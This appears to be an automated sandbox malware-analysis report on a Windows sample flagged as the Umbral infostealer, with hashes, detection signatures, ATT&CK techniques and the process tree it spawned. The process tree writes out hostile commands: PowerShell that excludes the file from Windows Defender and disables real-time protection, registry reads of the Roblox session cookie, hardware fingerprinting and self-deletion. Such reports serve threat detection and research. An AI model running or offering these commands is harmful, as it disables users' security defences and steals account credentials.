Analysis
-
max time kernel
20s -
max time network
23s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
19-09-2024 03:25
Behavioral task
behavioral1
Sample
733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe
Resource
win7-20240903-en
General
-
Target
733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe
-
Size
227KB
-
MD5
a9c85ce4900aa26ca173db8d18423290
-
SHA1
913ff9008ac363798994a5db576357623c3abb6b
-
SHA256
733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277
-
SHA512
2d2eb846ea057068ce639c39494adea686bbc76b7cce0eb4c0ea7396f0048bb3fafe3d9b24421d906d321576b8f3ac6517d4fa69886fecf958690b8fdf844cc9
-
SSDEEP
6144:eloZM+rIkd8g+EtXHkv/iD4mI1UOsTPkhFQu//O6vb8e1m0Li:IoZtL+EP8mI1UOsTPkhFQu//OAg
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/904-1-0x0000000000300000-0x0000000000340000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2816 powershell.exe 3068 powershell.exe 1060 powershell.exe 2616 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe -
Deletes itself 1 IoCs
pid Process 2168 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 10 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2168 cmd.exe 2176 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2144 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2176 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 2816 powershell.exe 2616 powershell.exe 3068 powershell.exe 2444 powershell.exe 1060 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe Token: SeIncreaseQuotaPrivilege 272 wmic.exe Token: SeSecurityPrivilege 272 wmic.exe Token: SeTakeOwnershipPrivilege 272 wmic.exe Token: SeLoadDriverPrivilege 272 wmic.exe Token: SeSystemProfilePrivilege 272 wmic.exe Token: SeSystemtimePrivilege 272 wmic.exe Token: SeProfSingleProcessPrivilege 272 wmic.exe Token: SeIncBasePriorityPrivilege 272 wmic.exe Token: SeCreatePagefilePrivilege 272 wmic.exe Token: SeBackupPrivilege 272 wmic.exe Token: SeRestorePrivilege 272 wmic.exe Token: SeShutdownPrivilege 272 wmic.exe Token: SeDebugPrivilege 272 wmic.exe Token: SeSystemEnvironmentPrivilege 272 wmic.exe Token: SeRemoteShutdownPrivilege 272 wmic.exe Token: SeUndockPrivilege 272 wmic.exe Token: SeManageVolumePrivilege 272 wmic.exe Token: 33 272 wmic.exe Token: 34 272 wmic.exe Token: 35 272 wmic.exe Token: SeIncreaseQuotaPrivilege 272 wmic.exe Token: SeSecurityPrivilege 272 wmic.exe Token: SeTakeOwnershipPrivilege 272 wmic.exe Token: SeLoadDriverPrivilege 272 wmic.exe Token: SeSystemProfilePrivilege 272 wmic.exe Token: SeSystemtimePrivilege 272 wmic.exe Token: SeProfSingleProcessPrivilege 272 wmic.exe Token: SeIncBasePriorityPrivilege 272 wmic.exe Token: SeCreatePagefilePrivilege 272 wmic.exe Token: SeBackupPrivilege 272 wmic.exe Token: SeRestorePrivilege 272 wmic.exe Token: SeShutdownPrivilege 272 wmic.exe Token: SeDebugPrivilege 272 wmic.exe Token: SeSystemEnvironmentPrivilege 272 wmic.exe Token: SeRemoteShutdownPrivilege 272 wmic.exe Token: SeUndockPrivilege 272 wmic.exe Token: SeManageVolumePrivilege 272 wmic.exe Token: 33 272 wmic.exe Token: 34 272 wmic.exe Token: 35 272 wmic.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 2616 powershell.exe Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 2444 powershell.exe Token: SeIncreaseQuotaPrivilege 588 wmic.exe Token: SeSecurityPrivilege 588 wmic.exe Token: SeTakeOwnershipPrivilege 588 wmic.exe Token: SeLoadDriverPrivilege 588 wmic.exe Token: SeSystemProfilePrivilege 588 wmic.exe Token: SeSystemtimePrivilege 588 wmic.exe Token: SeProfSingleProcessPrivilege 588 wmic.exe Token: SeIncBasePriorityPrivilege 588 wmic.exe Token: SeCreatePagefilePrivilege 588 wmic.exe Token: SeBackupPrivilege 588 wmic.exe Token: SeRestorePrivilege 588 wmic.exe Token: SeShutdownPrivilege 588 wmic.exe Token: SeDebugPrivilege 588 wmic.exe Token: SeSystemEnvironmentPrivilege 588 wmic.exe Token: SeRemoteShutdownPrivilege 588 wmic.exe Token: SeUndockPrivilege 588 wmic.exe Token: SeManageVolumePrivilege 588 wmic.exe Token: 33 588 wmic.exe Token: 34 588 wmic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 904 wrote to memory of 272 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 29 PID 904 wrote to memory of 272 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 29 PID 904 wrote to memory of 272 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 29 PID 904 wrote to memory of 2704 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 32 PID 904 wrote to memory of 2704 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 32 PID 904 wrote to memory of 2704 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 32 PID 904 wrote to memory of 2816 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 34 PID 904 wrote to memory of 2816 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 34 PID 904 wrote to memory of 2816 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 34 PID 904 wrote to memory of 2616 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 36 PID 904 wrote to memory of 2616 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 36 PID 904 wrote to memory of 2616 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 36 PID 904 wrote to memory of 3068 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 38 PID 904 wrote to memory of 3068 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 38 PID 904 wrote to memory of 3068 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 38 PID 904 wrote to memory of 2444 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 40 PID 904 wrote to memory of 2444 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 40 PID 904 wrote to memory of 2444 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 40 PID 904 wrote to memory of 588 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 42 PID 904 wrote to memory of 588 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 42 PID 904 wrote to memory of 588 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 42 PID 904 wrote to memory of 1540 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 44 PID 904 wrote to memory of 1540 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 44 PID 904 wrote to memory of 1540 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 44 PID 904 wrote to memory of 2948 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 46 PID 904 wrote to memory of 2948 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 46 PID 904 wrote to memory of 2948 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 46 PID 904 wrote to memory of 1060 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 48 PID 904 wrote to memory of 1060 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 48 PID 904 wrote to memory of 1060 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 48 PID 904 wrote to memory of 2144 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 50 PID 904 wrote to memory of 2144 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 50 PID 904 wrote to memory of 2144 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 50 PID 904 wrote to memory of 2168 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 52 PID 904 wrote to memory of 2168 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 52 PID 904 wrote to memory of 2168 904 733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe 52 PID 2168 wrote to memory of 2176 2168 cmd.exe 54 PID 2168 wrote to memory of 2176 2168 cmd.exe 54 PID 2168 wrote to memory of 2176 2168 cmd.exe 54 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2704 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe"C:\Users\Admin\AppData\Local\Temp\733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:272
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe"2⤵
- Views/modifies file attributes
PID:2704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:1540
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1060
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2144
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\733c9f0a21cb6a4386496fa43fd1b2255e07adec398ea5a296523ffbacf83277N.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2176
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5da874ae3229cdb58283b2f204777d039
SHA128b3ff96149066e1ba62cac701f66a52c05f533f
SHA25619675f8169c5bd23f0986f0aa94c8b08bdd17737a7acebff8e4640027fe2c1cd
SHA5122a3b3e743d34f69b8454f6e24f4c8fa60f2ea33b3c33145ef090f8974a1b2df9d0294c1024269fdbb3e8838615c61367c72870d2951663c9a7803aad198a867a